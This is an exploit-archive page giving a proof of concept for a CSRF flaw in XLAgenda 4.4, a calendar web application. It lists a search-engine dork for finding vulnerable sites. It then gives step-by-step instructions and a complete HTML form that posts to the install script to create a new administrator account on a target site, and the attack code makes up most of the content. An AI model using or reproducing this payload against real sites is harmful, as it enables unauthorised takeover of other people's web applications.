Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
====================================================================================================================================
| # Title : XLAgenda v4.4 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://xavier.lequere.net/xlagenda/ |
| # Dork : "Propulsé par XLAgenda 4.4" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin.
[+] Go to the line 12.
[+] Set the target site link Save changes and apply.
[+] infected file : /install/install2.php.
[+] http://127.0.0.1/xlagenda44/install/install2.php
[+] save code as poc.html .
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XLAgenda 4.4 | Installation</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex, nofollow" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<h1>Installation - Etape 2/3</h1>
<p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p>
<form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">
<h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>
<p>
<label for="user">Nom d'utilisateur :</label><br>
<input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>
(20 caractères maximum)
</p>
<p>
<label for="pass">Mot de passe :</label><br>
<input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>
(6 à 15 caractères)
</p>
<p>
<label for="pass2">Introduisez à nouveau le mot de passe :</label><br>
<input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *
</p>
<p>
<label for="nom">Nom :</label><br>
<input name="nom" type="text" id="nom" value="" size="30" />
</p>
<p>
<label for="prenom">Prénom :</label><br>
<input name="prenom" type="text" id="prenom" value="" size="30" />
</p>
<p>
<label for="email">Adresse email :</label><br>
<input name="email" type="text" id="email" value="" size="30" /> *
</p>
<p>
Les champs marqués d'un * sont obligatoires.<br>
Votre adresse email n'apparaîtra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.
</p>
<p style="text-align:center;">
<input type="submit" name="Submit" value="Continuer >>" />
</p>
</form></body>
</html>
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
File Tags
- ActiveX[18] (932)
- Advisory[19] (81,789)
- Arbitrary[20] (16,166)
- BBS[21] (2,859)
- Bypass[22] (1,736)
- CGI[23] (1,025)
- Code Execution[24] (7,248)
- Conference[25] (679)
- Cracker[26] (841)
- CSRF[27] (3,336)
- DoS[28] (23,383)
- Encryption[29] (2,365)
- Exploit[30] (51,681)
- File Inclusion[31] (4,215)
- File Upload[32] (969)
- Firewall[33] (821)
- Info Disclosure[34] (2,758)
- Intrusion Detection[35] (891)
- Java[36] (3,037)
- JavaScript[37] (851)
- Kernel[38] (6,656)
- Local[39] (14,442)
- Magazine[40] (586)
- Overflow[41] (12,666)
- Perl[42] (1,423)
- PHP[43] (5,140)
- Proof of Concept[44] (2,338)
- Protocol[45] (3,584)
- Python[46] (1,531)
- Remote[47] (30,691)
- Root[48] (3,577)
- Rootkit[49] (508)
- Ruby[50] (612)
- Scanner[51] (1,638)
- Security Tool[52] (7,878)
- Shell[53] (3,177)
- Shellcode[54] (1,212)
- Sniffer[55] (894)
- Spoof[56] (2,196)
- SQL Injection[57] (16,324)
- TCP[58] (2,398)
- Trojan[59] (687)
- UDP[60] (885)
- Virus[61] (664)
- Vulnerability[62] (31,727)
- Web[63] (9,624)
- Whitepaper[64] (3,748)
- x86[65] (962)
- XSS[66] (17,882)
- Other[67]
File Archives
- July 2023[68]
- June 2023[69]
- May 2023[70]
- April 2023[71]
- March 2023[72]
- February 2023[73]
- January 2023[74]
- December 2022[75]
- November 2022[76]
- October 2022[77]
- September 2022[78]
- August 2022[79]
- Older[80]
Systems
- AIX[81] (428)
- Apple[82] (2,002)
- BSD[83] (373)
- CentOS[84] (57)
- Cisco[85] (1,922)
- Debian[86] (6,797)
- Fedora[87] (1,691)
- FreeBSD[88] (1,244)
- Gentoo[89] (4,322)
- HPUX[90] (879)
- iOS[91] (351)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (67)
- Linux[95] (46,284)
- Mac OS X[96] (685)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (484)
- RedHat[100] (13,612)
- Slackware[101] (941)
- Solaris[102] (1,610)
- SUSE[103] (1,444)
- Ubuntu[104] (8,780)
- UNIX[105] (9,271)
- UnixWare[106] (186)
- Windows[107] (6,565)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]